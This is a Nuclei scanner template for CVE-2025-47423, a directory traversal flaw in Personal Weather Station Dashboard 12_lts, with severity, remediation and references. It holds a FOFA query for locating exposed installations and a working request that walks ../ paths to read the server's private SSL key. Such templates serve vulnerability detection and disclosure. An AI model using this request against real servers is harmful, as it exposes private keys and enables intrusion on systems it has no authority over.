Personal Weather Station Dashboard 12_lts allows unauthenticated remote attackers to read arbitrary files via ../ directory traversal in the test parameter to /others/_test.php, as demonstrated by reading the server's private SSL key in cleartext.
PoC代码[已公开]
id: CVE-2025-47423
info:
name: Personal Weather Station Dashboard 12 - Directory Traversal
author: pussycat0x
severity: high
description: |
Personal Weather Station Dashboard 12_lts allows unauthenticated remote attackers to read arbitrary files via ../ directory traversal in the test parameter to /others/_test.php, as demonstrated by reading the server's private SSL key in cleartext.
impact: |
Unauthenticated attackers can read arbitrary files including private SSL keys through directory traversal in the test parameter, potentially exposing sensitive cryptographic material.
remediation: |
Upgrade Personal Weather Station Dashboard to a version later than 12_lts that properly validates file paths.
reference:
- https://github.com/Haluka92/CVE-2025-47423
- https://pwsdashboard.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2025-47423
cwe-id: CWE-24
epss-score: 0.01034
epss-percentile: 0.76933
metadata:
fofa-query: title="PWS Dashboard"
max-request: 2
tags: cve,cve2025,lfi,pws,traversal,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "PWS Dashboard</title>"
internal: true
- raw:
- |
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "BEGIN RSA PRIVATE KEY"
- "END RSA PRIVATE KEY"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022015b6aebdb034ccba7a5b6f4fbce70464a1fc3b91f100c66ac5237e0fe7fc022e022100d431887fc9b22058dedf0e47c7ab7a281dc90e53d7c286cf5a63f7682e9ff5ff:922c64590222798bb761d5b6d8e72950